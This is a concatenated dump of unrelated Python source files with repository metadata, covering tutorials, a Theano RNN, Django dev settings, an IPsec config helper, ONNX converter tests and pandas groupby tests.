de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 230
|
py
|
#calss header
class _COMMONERS():
def __init__(self,):
self.name = "COMMONERS"
self.definitions = commoner
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['commoner']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
da3148eda0d51e3d5d6c53ed95cca7d8fd467839
|
75ce5b7fee397fe4e67ed15a58f4cd42e0f8de9f
|
/PythonMasterclass/OOP/oop.py
|
8f9a4c844627350a4a88b461ec85cf8bb780bbce
|
[] |
no_license
|
lukbast/stuff
|
7fd03b7e035394802c307682a25621dfd667960b
|
160e1d77d1b592fac099b9c7139fb4e2f7f8dbbe
|
refs/heads/main
| 2023-08-06T21:39:55.334812
| 2021-09-23T17:37:47
| 2021-09-23T17:37:47
| 409,684,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
class Kettle(object):
power_source = 'electricity'
def __init__(self, make, price):
self.make = make
self.price = price
self.on = False
def turn_on(self):
self.on = True
philips = Kettle('Philips', 420)
kenwood = Kettle('Kenwood', 9.99)
kenwood.price = 666
print(kenwood.price)
kenwood.turn_on()
print(kenwood.on)
print('Kettle: {0.make}, for {0.price}, isOn: {0.on}'.format(kenwood))
# In piton you can add new attributes to a object like this
kenwood.color = 'magenta'
print(kenwood.color)
# DUN DUN DUN
print(philips.power_source)
print(kenwood.power_source)
kenwood.power_source = 'hamsters'
print(kenwood.power_source)
print(philips.power_source)
Kettle.power_source = 'Atomic'
print(kenwood.power_source)
print(philips.power_source)
|
[
"jaimperator99@gmail.com"
] |
jaimperator99@gmail.com
|
3e64394d796a026c719123cf7ef89bcb82365121
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.py
|
45c4a65ca1273ffe327210776740e7315636db7c
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 370
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[181.03425,15.602694], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
ce9e81e2b51bb97642a79f8b467a2770571ede66
|
eea1be5dbac7fa10167eae167eb6712e3937f53a
|
/voidcoin/settings/dev.py
|
70ec86d6e913a5df701dd36881e48c14a73f0cf7
|
[] |
no_license
|
chidimo/Voidcoin
|
40962e46661b2a7106bd8e60d0830c3b9629b8fa
|
227c160dfa671818522781aab013f2d1fcb098a9
|
refs/heads/develop
| 2022-12-09T17:40:26.294425
| 2019-07-04T08:32:20
| 2019-07-04T08:32:20
| 135,197,447
| 5
| 2
| null | 2022-12-08T02:08:45
| 2018-05-28T18:45:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,964
|
py
|
from .base import *
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'voidcoin',
'USER': 'postgres',
'PASSWORD': config('DEV_DB_PASSWORD'),
'HOST': 'localhost',
'PORT': 5432
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
INSTALLED_APPS += ['debug_toolbar']
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
MIDDLEWARE += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'formatters': {
# 'verbose': {
# 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
# 'datefmt' : "%d/%b/%Y %H:%M:%S"
# },
# 'simple': {
# 'format': '%(levelname)s %(message)s'
# },
# },
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'voidcoin_dev.log'),
# 'formatter': 'verbose'
# },
# },
# 'loggers': {
# 'django': {
# 'handlers':['file'],
# 'propagate': True,
# 'level':'DEBUG',
# },
# 'MYAPP': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# },
# }
# }
|
[
"orjichidi95@gmail.com"
] |
orjichidi95@gmail.com
|
6066c82429a06cfc912a197d31d676903f1d208e
|
cd50ed5464a5397b4e5bafc36efebf88f14b2d8b
|
/models/rnn_theano.py
|
cd97581f15b5bc82263db599c4e65f8f297ca657
|
[] |
no_license
|
millatidy/hit400_lstm
|
cc6db62c68f18296e40a75395725a8112d4632e8
|
38bce32bd8bec5c20e373957526bfecf79a3a761
|
refs/heads/master
| 2021-06-18T01:20:17.006138
| 2017-05-09T01:44:24
| 2017-05-09T01:44:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,909
|
py
|
import numpy as np
import theano as theano
import theano.tensor as T
from utils import *
import operator
class RNN_THEANO:
'''
input_dim is the array size of the input data
hidden_dim is the array size of the hidden input_dim
output_dim is the array size of the output
# input weights is array [input_dim,hidden_dim]
# hidden weights is array [hidden_dim, hidden_dim]
# output weights is array [hidden_dim, output_dim]
'''
def __init__(self, input_dim, hidden_dim, output_dim, bptt_truncate=4):
# assign instance variables
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
self.bptt_truncate = bptt_truncate
# randomly initialize network weights as
input_to_hidden_weights = np.random.uniform(-np.sqrt(1./input_dim), np.sqrt(1./input_dim), (hidden_dim, input_dim))
hidden_to_hidden_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))
hidden_to_output_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (output_dim, hidden_dim))
# Theano: Create share variables
self.IH = theano.shared(name='IH', value=input_to_hidden_weights.astype(theano.config.floatX))
self.HH = theano.shared(name='HH', value=hidden_to_hidden_weights.astype(theano.config.floatX))
self.HO = theano.shared(name='HO', value=hidden_to_output_weights.astype(theano.config.floatX))
# We store theano graph = {}
self.theano = {}
self.__theano_build__()
def __theano_build__(self):
IH, HH, HO = self.IH, self.HH, self.HO
x = T.ivector('x')
y = T.ivector('y')
def forward_prop_step(x_t, h_t_prev, IH, HH, HO):
h_t = T.tanh(IH[:,x_t] + HH.dot(h_t_prev))
o_t = T.nnet.softmax(HO.dot(h_t))
return [o_t[0], h_t]
[o,h], updates = theano.scan(
forward_prop_step,
sequences=x,
outputs_info=[None, dict(initial=T.zeros(self.hidden_dim))],
non_sequences=[IH, HH, HO],
truncate_gradient=self.bptt_truncate,
strict=True)
prediction = T.argmax(o, axis=1)
o_error = T.sum(T.nnet.categorical_crossentropy(o,y))
# Gradients
dIH = T.grad(o_error, IH)
dHH = T.grad(o_error, HH)
dHO = T.grad(o_error, HO)
# Assign functions
self.forward_propagation = theano.function([x], o)
self.predict = theano.function([x], prediction)
self.ce_error = theano.function([x,y], o_error)
self.bptt = theano.function([x,y], [dIH, dHH, HO])
# SGD
learning_rate = T.scalar('learning_rate')
self.sdg_step = theano.function([x,y,learning_rate], [],
updates=[(self.IH, self.IH - learning_rate * dIH),
(self.HH, self.HH - learning_rate * dHH),
(self.HO, self.HH - learning_rate * dHO)])
def calculate_total_loss(self, X, Y):
return np.sum([self.ce_error(x,y) for x,y in zip(X,Y)])
def calculate_loss(self, X, Y):
# Divide calculate_loss by the number of words
num_words = np.sum([len(y) for y in Y])
return self.calculate_total_loss(X,Y)/float(num_words)
def gradient_check_theano(model, x, y, h=0.001, error_threshold=0.01):
# Overwrite the bptt attribute. We need to backpropagate all the way to get the correct gradient
model.bptt_truncate = 1000
# Calculate the gradients using backprop
bptt_gradients = model.bptt(x, y)
# List of all parameters we want to chec.
model_parameters = ['U', 'V', 'W']
# Gradient check for each parameter
for pidx, pname in enumerate(model_parameters):
# Get the actual parameter value from the mode, e.g. model.W
parameter_T = operator.attrgetter(pname)(model)
parameter = parameter_T.get_value()
print "Performing gradient check for parameter %s with size %d." % (pname, np.prod(parameter.shape))
# Iterate over each element of the parameter matrix, e.g. (0,0), (0,1), ...
it = np.nditer(parameter, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
# Save the original value so we can reset it later
original_value = parameter[ix]
# Estimate the gradient using (f(x+h) - f(x-h))/(2*h)
parameter[ix] = original_value + h
parameter_T.set_value(parameter)
gradplus = model.calculate_total_loss([x],[y])
parameter[ix] = original_value - h
parameter_T.set_value(parameter)
gradminus = model.calculate_total_loss([x],[y])
estimated_gradient = (gradplus - gradminus)/(2*h)
parameter[ix] = original_value
parameter_T.set_value(parameter)
# The gradient for this parameter calculated using backpropagation
backprop_gradient = bptt_gradients[pidx][ix]
# calculate The relative error: (|x - y|/(|x| + |y|))
relative_error = np.abs(backprop_gradient - estimated_gradient)/(np.abs(backprop_gradient) + np.abs(estimated_gradient))
# If the error is to large fail the gradient check
if relative_error > error_threshold:
print "Gradient Check ERROR: parameter=%s ix=%s" % (pname, ix)
print "+h Loss: %f" % gradplus
print "-h Loss: %f" % gradminus
print "Estimated_gradient: %f" % estimated_gradient
print "Backpropagation gradient: %f" % backprop_gradient
print "Relative Error: %f" % relative_error
return
it.iternext()
print "Gradient check for parameter %s passed." % (pname)
|
[
"tidymilla@gmail.com"
] |
tidymilla@gmail.com
|
f7563abdb8f484051174f08311f015a78de85abb
|
a01e7f87a0088965e2e0a02476d2df12a49a1a18
|
/package/vpntfi/build/lib/vpnmodule/lib/ipsec.py
|
ec9ef5f7c46a4f3932aa7db489e96b7baad3399c
|
[] |
no_license
|
gsrr/IFT_jerry
|
0456a8a1fb98f84ad5c26dc36bdf32e2d85c750c
|
4c2f6900dfd7ae7f6b3cc2150b1c1be236b4c95c
|
refs/heads/master
| 2020-04-04T05:30:10.544252
| 2019-08-22T09:12:03
| 2019-08-22T09:12:03
| 48,145,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
import sys
import os
import configLoader
import mcommon
def make_replace_func(src, dst):
def wrap_func(items):
with open(src, "r") as fr:
with open(dst, "w") as fw:
for line in fr.readlines():
line = line.strip()
for key in items.keys():
if key in line:
line = line.replace(key, items[key])
break
fw.write(line + "\n")
return wrap_func
class IPSec:
def __init__(self, conf = "/etc/strongswan/ipsec.conf"):
self.conf = conf
self.clobj = configLoader.ConfigIPSec(cfg=self.conf + ".default")
self.clobj.load()
def getcfg(self):
print self.clobj.cfg
def _add(self, *paras):
key = paras[0]
value = paras[1]
self.clobj.add(key, value)
def _remove(self, *paras):
key = paras[0]
self.clobj.remove(key)
def status(self):
cmd = "systemctl is-active strongswan"
output = mcommon.call_cmdstr(cmd)[0]
return output
def replacePSK(self, *paras):
src = "/etc/strongswan/ipsec.secrets.default"
dst = "/etc/strongswan/ipsec.secrets"
items = {'[PSK]' : paras[0]}
func = make_replace_func(src, dst)
func(items)
def unload(self):
self.clobj.unload(self.conf)
def showconf(self):
os.system("cat %s"%self.conf)
def decor_test(func):
def wrap_func():
obj = IPSec("/etc/strongswan/ipsec.conf")
obj.getcfg()
obj.unload()
obj.showconf()
return wrap_func
@decor_test
def test_ipsec(obj):
pass
def main():
func=getattr(sys.modules[__name__], sys.argv[1])
func()
if __name__ == "__main__":
main()
|
[
"jerrycheng1128@gmail.com"
] |
jerrycheng1128@gmail.com
|
04a5ac227ff16d908d6ea9c43ed65181b56820de
|
46b432cd3557038c454601367b878f889c9b6a8f
|
/kiyuna/tutorial07/tutorial07.py
|
cd07ce259e448005ecafb1d76d2ccac03e4a9643
|
[] |
no_license
|
tmu-nlp/NLPtutorial2019
|
84ceec06568fd9d899a686658fb8851466133375
|
d77d199c50cd37d70e462209a7bfcd4dee9140a1
|
refs/heads/master
| 2020-05-14T13:34:05.336594
| 2019-09-25T02:25:41
| 2019-09-25T02:25:41
| 181,814,723
| 1
| 0
| null | 2019-08-01T18:53:54
| 2019-04-17T04:04:06
|
Python
|
UTF-8
|
Python
| false
| false
| 478
|
py
|
from train_nn import *
from test_nn import *
import subprocess
train_path = '../../data/titles-en-train.labeled'
train_nn(train_path, layer_num=1, node_num=2, epoch_num=1, λ=0.1)
test_path = '../../data/titles-en-test.word'
out_path = './out.txt'
test_nn(test_path, out_path)
script_path = '../../script/grade-prediction.py'
ans_path = '../../data/titles-en-test.labeled'
subprocess.run(f'{script_path} {ans_path} {out_path}'.split())
''' RESULT
Accuracy = 92.915338%
'''
|
[
"kyuna.prog@gmail.com"
] |
kyuna.prog@gmail.com
|
54af5cd1a521f7e55d1fc43f8010b47de5507d7a
|
67325192c1e528a39d457f11e61b480d68826708
|
/mods/mcpython/Commands/paststructur.py
|
117c93e349a2e464fbdd360aea9102a06eae33c7
|
[
"MIT"
] |
permissive
|
vashistaarav1611/mcpython-a-minecraft-clone-in-python
|
5851b377b54fd2b28c106112c7b18f397b71ab50
|
c16cd66f319efdeec4130e1a43f5a857caf1ea13
|
refs/heads/master
| 2023-02-01T22:48:51.787106
| 2020-12-21T15:02:25
| 2020-12-21T15:02:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 693
|
py
|
# todo: remove
from . import Command
import structures
import globals as G
class paststructur(Command.Command):
@staticmethod
def getHelp():
return "/paststructur <name> <x> <y> <z>"
@staticmethod
def isCommand(line):
return line.split(" ")[0] == "/paststructur"
@staticmethod
def getSyntaxError(line, entity, position, chat): # todo: add systax-system
pass
@staticmethod
def parse(line, entity, position, chat):
sc = line.split(" ")
name = sc[1]
x, y, z = int(sc[2]), int(sc[3]), int(sc[4])
structures.handler.structures[name].past(G.window.model, x, y, z)
Command.handler.register(paststructur)
|
[
"baulukas1301@googlemail.com"
] |
baulukas1301@googlemail.com
|
d86340a6767ed274ae880923b13b4c21609393f6
|
047fbc11cd389e56865034cf473807db8718d92e
|
/assignment_test.py
|
46933b2148fcdc536230cfb6950f6b105b7d6bba
|
[] |
no_license
|
SDSS-Computing-Studies/002b-basic-math-Sebastianmaudee
|
5c07d14dd2f13a6de8674d08c36f614defd1d84a
|
ae9826096b03ba4cf0d45fa27ec4acf9449570b7
|
refs/heads/master
| 2023-08-28T23:20:37.346270
| 2021-10-21T21:16:41
| 2021-10-21T21:16:41
| 406,925,526
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
#! python3
import a1, a2, a3, a4, a5, a6
def test1():
assert a1.answer == 14
def test2():
assert a2.answer == 3
def test3():
assert a3.answer == 10
def test4():
assert a4.answer == 2.5
def test5():
assert a5.answer == 1
def test6():
assert a6.answer == 25
|
[
"66690702+github-classroom[bot]@users.noreply.github.com"
] |
66690702+github-classroom[bot]@users.noreply.github.com
|
ee9703daa5cc3632e67a2217d830eed7463293cf
|
48fab33def7dfaed44dbf0a2c5c148798a10c4c8
|
/test/onnx_converter_test/hugectr2onnx_wdl_test.py
|
7577b6ee48494f469b7d97b2915f797fb76344de
|
[
"Apache-2.0"
] |
permissive
|
js-ts/HugeCTR
|
787fa22e8643cbfe7c6b9dac4414a70eb37f322c
|
085b2e8ad2abaee5578e7bf43b8394d0b8473b58
|
refs/heads/master
| 2023-08-16T11:29:57.490236
| 2021-10-21T02:31:24
| 2021-10-21T02:31:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,851
|
py
|
#
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hugectr
from hugectr.inference import InferenceParams, CreateInferenceSession
import hugectr2onnx
import onnxruntime as ort
from utils import read_samples_for_wdl, compare_array_approx
import numpy as np
def hugectr2onnx_wdl_test(batch_size, num_batches, data_source, data_file, graph_config, dense_model, sparse_models, onnx_model_path, model_name):
hugectr2onnx.converter.convert(onnx_model_path, graph_config, dense_model, True, sparse_models)
label, dense, wide_data, deep_data = read_samples_for_wdl(data_file, batch_size*num_batches, slot_num = 27)
sess = ort.InferenceSession(onnx_model_path)
res = sess.run(output_names=[sess.get_outputs()[0].name],
input_feed={sess.get_inputs()[0].name: dense, sess.get_inputs()[1].name: wide_data, sess.get_inputs()[2].name: deep_data})
res = res[0].reshape(batch_size*num_batches,)
inference_params = InferenceParams(model_name = model_name,
max_batchsize = batch_size,
hit_rate_threshold = 0.6,
dense_model_file = dense_model,
sparse_model_files = sparse_models,
device_id = 0,
use_gpu_embedding_cache = True,
cache_size_percentage = 0.6,
i64_input_key = False)
inference_session = CreateInferenceSession(graph_config, inference_params)
predictions = inference_session.predict(num_batches, data_source, hugectr.DataReaderType_t.Norm, hugectr.Check_t.Sum)
compare_array_approx(res, predictions, model_name, 1e-3, 1e-2)
if __name__ == "__main__":
hugectr2onnx_wdl_test(64, 100, "./wdl_data/file_list_test.txt",
"./wdl_data/val/sparse_embedding0.data",
"/onnx_converter/graph_files/wdl.json",
"/onnx_converter/hugectr_models/wdl_dense_2000.model",
["/onnx_converter/hugectr_models/wdl0_sparse_2000.model",
"/onnx_converter/hugectr_models/wdl1_sparse_2000.model"],
"/onnx_converter/onnx_models/wdl.onnx",
"wdl")
|
[
"zehuanw@nvidia.com"
] |
zehuanw@nvidia.com
|
41d3c3423049d66be5d5a676da6f65fc11ccee96
|
3117852233ea6c2644e723587a7b28d6d6518d95
|
/Calculator_Gamma.py
|
56834b8c0142138f9ff1356056dec9729eb49cbb
|
[] |
no_license
|
harishravi121/Pythoncodes
|
d70059a3b7785d668a4b03f3ec85b0777b33706f
|
1d6d6ca0ed6348b6c5d07d27d24668fb567527ca
|
refs/heads/master
| 2023-07-07T11:58:03.741814
| 2023-07-01T08:01:56
| 2023-07-01T08:01:56
| 211,642,477
| 3
| 0
| null | 2020-01-13T06:45:25
| 2019-09-29T10:00:32
|
Python
|
UTF-8
|
Python
| false
| false
| 4,117
|
py
|
#The ALU has digital circuits for sum, subtraction, multiplication and comparision.
#The challenge here would be to write the code for division, square root, trignometric and other fuctions
#The following python code just needs python install of 30 MB
x='25'; #2 digit number
y='14'; #2 digit number
#Doing representation of two digit product
product=int(x[1])*int(y[1])+10*(int(x[0])*int(y[1])+int(x[1])*int(y[0]))+int(x[0])*int(y[0])*100
#Doing representation of digit sum and subtraction
add=int(x[1])+int(y[1])+10*(int(x[0])+int(y[0]))
sub=int(x[1])-int(y[1])+10*(int(x[0])-int(y[0]))
#Showing output,
print('Product of ',x,' and' ,y,' ', product)
print('Sum of',x,' and' ,y,' ',add)
print('Subtraction ',x,' and' ,y,' ',sub)
#Dividing x a two digit number by z a single digit number
z='3'# Single digit number
ha=1;# While loop flag
j=0; # Increasing the quotient in the loop until the product exceeds the divisor
while ha:
r=int(x[1])+10*int(x[0])-j*int(z[0]);
if(r<int(z[0])):
ha=0; #Setting the while loop flag to 0 to come out of the loop
j=j+1; #incrementing the quotient until it divides
j=j-1; # Reducing the quotient as we counted one past
#Getting the decimal point of the quotient
ha=1;
h=0;
while ha:
r2=r*10-h*int(z[0]);
if(r2<int(z[0])):
ha=0;
h=h+1;
h=h-1;
print('division of ',x,' and' ,z,' ',j,'.',h)
#Finding square root by subtracting successively the contribution from most significant digit.
sq='314';
ha=1;
a=0;
while ha:
luv=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a;
a=a+1;
if luv<0:
ha=0;
a=a-2;
ha=1;
b=0;
while ha:
luv2=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b;
b=b+1;
if luv2<0:
ha=0;
b=b-2;
ha=1;
c=0;
while ha:
luv3=100*(int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b)-c*(200*a+20*b+c);
c=c+1;
if luv3<0:
ha=0;
c=c-2;
print('Square root of ',sq , ' ',10*a+b,'.',c)
#Maclaurin expansion of all trignometric and hyperbolic functions
n=100
def hfactorial(n):
s=1;
for j in range(1,n+1):
s=s*j
return s
def hsin(x):
return x-x*x*x/6+x*x*x*x*x/120-x*x*x*x*x*x*x/5040;
def hcos(x):
return 1-x*x/2+1/24*x*x*x*x-x*x*x*x*x*x/720;
def htan(x):
return x+x*x*x/3+2/15*x*x*x*x*x+17/315*x*x*x*x*x*x*x+62/2035*x*x*x*x*x*x*x*x*x;
def h2cos(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j)*(x**(2*j))
return s
def h2sin(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2sinh(x):
s=0.0;
for j in range(n):
s=s+1/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2atanh(x):
s=0.0;
for j in range(1,n):
s=s+1/(2*j-1)*(x**(2*j-1))
return s
def h2atan(x):
s=0.0;
for j in range(1,n):
s=s+(-1.0)**(j+1)/(2*j-1)*(x**(2*j-1))
return s
def h2ln1px(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**(j+1)/j*(x**(j))
return s
def h2erf(x):
s=0.0;
for j in range(1,n):
s=s+2/np.sqrt(np.pi)*(-1)**j/(2*j+1)/hfactorial(j)*(x**(2*j+1))
return s
def h2exp(x):
s=0.0;
for j in range(n):
s=s+1.0/hfactorial(j)*(x**(j))
return s
def h2acot(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**j/(2*j+1)*(x**(2*j+1))
return np.pi/2-s
def h2cosh(x):
s=0.0;
for j in range(1,n):
s=s+1/hfactorial(2*j)*(x**(2*j))
return s
print('pi',h2atan(1)*4.0)
print('e',h2exp(1))
"""
import numpy as np
import matplotlib.pyplot as plt
def h2gamma(n):
if n==1:
return 1;
if n==0.5:
return 1;
else:
return (n-1)*h2gamma(n-1);
x=np.arange(0,0.5,0.1)
#plt.plot(x,h2sin(x),x,h2cos(x),x,h2exp(x),x,h2erf(x),x,h2cosh(x),x,h2acot(x),x,h2erf(x),x,h2ln1px(x),x,h2atan(x),x,h2atanh(x))
#plt.show()
"""
|
[
"noreply@github.com"
] |
harishravi121.noreply@github.com
|
4ba94ad8d63b1aded9da71576d77fa7a6caafdec
|
159d4ae61f4ca91d94e29e769697ff46d11ae4a4
|
/venv/lib/python3.9/site-packages/pandas/tests/groupby/test_min_max.py
|
25a57d24e04ef974fbd644249e8114cbe40588c9
|
[
"MIT"
] |
permissive
|
davidycliao/bisCrawler
|
729db002afe10ae405306b9eed45b782e68eace8
|
f42281f35b866b52e5860b6a062790ae8147a4a4
|
refs/heads/main
| 2023-05-24T00:41:50.224279
| 2023-01-22T23:17:51
| 2023-01-22T23:17:51
| 411,470,732
| 8
| 0
|
MIT
| 2023-02-09T16:28:24
| 2021-09-28T23:48:13
|
Python
|
UTF-8
|
Python
| false
| false
| 5,733
|
py
|
import numpy as np
import pytest
from pandas._libs.tslibs import iNaT
import pandas as pd
from pandas import (
DataFrame,
Index,
Series,
)
import pandas._testing as tm
def test_max_min_non_numeric():
# #2700
aa = DataFrame({"nn": [11, 11, 22, 22], "ii": [1, 2, 3, 4], "ss": 4 * ["mama"]})
result = aa.groupby("nn").max()
assert "ss" in result
result = aa.groupby("nn").max(numeric_only=False)
assert "ss" in result
result = aa.groupby("nn").min()
assert "ss" in result
result = aa.groupby("nn").min(numeric_only=False)
assert "ss" in result
def test_max_min_object_multiple_columns(using_array_manager):
# GH#41111 case where the aggregation is valid for some columns but not
# others; we split object blocks column-wise, consistent with
# DataFrame._reduce
df = DataFrame(
{
"A": [1, 1, 2, 2, 3],
"B": [1, "foo", 2, "bar", False],
"C": ["a", "b", "c", "d", "e"],
}
)
df._consolidate_inplace() # should already be consolidate, but double-check
if not using_array_manager:
assert len(df._mgr.blocks) == 2
gb = df.groupby("A")
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.max(numeric_only=False)
# "max" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["b", "d", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.min(numeric_only=False)
# "min" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["a", "c", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
def test_min_date_with_nans():
# GH26321
dates = pd.to_datetime(
Series(["2019-05-09", "2019-05-09", "2019-05-09"]), format="%Y-%m-%d"
).dt.date
df = DataFrame({"a": [np.nan, "1", np.nan], "b": [0, 1, 1], "c": dates})
result = df.groupby("b", as_index=False)["c"].min()["c"]
expected = pd.to_datetime(
Series(["2019-05-09", "2019-05-09"], name="c"), format="%Y-%m-%d"
).dt.date
tm.assert_series_equal(result, expected)
result = df.groupby("b")["c"].min()
expected.index.name = "b"
tm.assert_series_equal(result, expected)
def test_max_inat():
# GH#40767 dont interpret iNaT as NaN
ser = Series([1, iNaT])
gb = ser.groupby([1, 1])
result = gb.max(min_count=2)
expected = Series({1: 1}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
result = gb.min(min_count=2)
expected = Series({1: iNaT}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
# not enough entries -> gets masked to NaN
result = gb.min(min_count=3)
expected = Series({1: np.nan})
tm.assert_series_equal(result, expected, check_exact=True)
def test_max_inat_not_all_na():
# GH#40767 dont interpret iNaT as NaN
# make sure we dont round iNaT+1 to iNaT
ser = Series([1, iNaT, 2, iNaT + 1])
gb = ser.groupby([1, 2, 3, 3])
result = gb.min(min_count=2)
# Note: in converting to float64, the iNaT + 1 maps to iNaT, i.e. is lossy
expected = Series({1: np.nan, 2: np.nan, 3: iNaT + 1})
tm.assert_series_equal(result, expected, check_exact=True)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_column(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a")["b"], func)()
idx = pd.Int64Index([1, 2], name="a")
expected = Series(periods, index=idx, name="b")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_frame(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a"), func)()
idx = pd.Int64Index([1, 2], name="a")
expected = DataFrame({"b": periods}, index=idx)
tm.assert_frame_equal(result, expected)
def test_aggregate_numeric_object_dtype():
# https://github.com/pandas-dev/pandas/issues/39329
# simplified case: multiple object columns where one is all-NaN
# -> gets split as the all-NaN is inferred as float
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": [np.nan] * 4},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [np.nan, np.nan]}
).set_index("key")
tm.assert_frame_equal(result, expected)
# same but with numbers
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": range(4)},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [0, 2]}
).set_index("key")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_aggregate_categorical_lost_index(func: str):
# GH: 28641 groupby drops index, when grouping over categorical column with min/max
ds = Series(["b"], dtype="category").cat.as_ordered()
df = DataFrame({"A": [1997], "B": ds})
result = df.groupby("A").agg({"B": func})
expected = DataFrame({"B": ["b"]}, index=Index([1997], name="A"))
# ordered categorical dtype should be preserved
expected["B"] = expected["B"].astype(ds.dtype)
tm.assert_frame_equal(result, expected)
|
[
"davidycliao@gmail.com"
] |
davidycliao@gmail.com
|
fd14a8d1149199664afe6d1f9f84b157b93b7cfb
|
bc1b9455826f2e07976c04b20515ac4a45eaf6b6
|
/pyrax/resource.py
|
da570dcd342c43305fcae4a4a1f9c5ba3598bcd5
|
[] |
no_license
|
gondoi/pyrax
|
b3df411d4c1ed8d8e1e0151e9378f7400ff782fc
|
4a917f55e706b650774a305a424ed456da773f02
|
refs/heads/master
| 2021-01-18T11:21:13.557056
| 2012-12-19T22:49:52
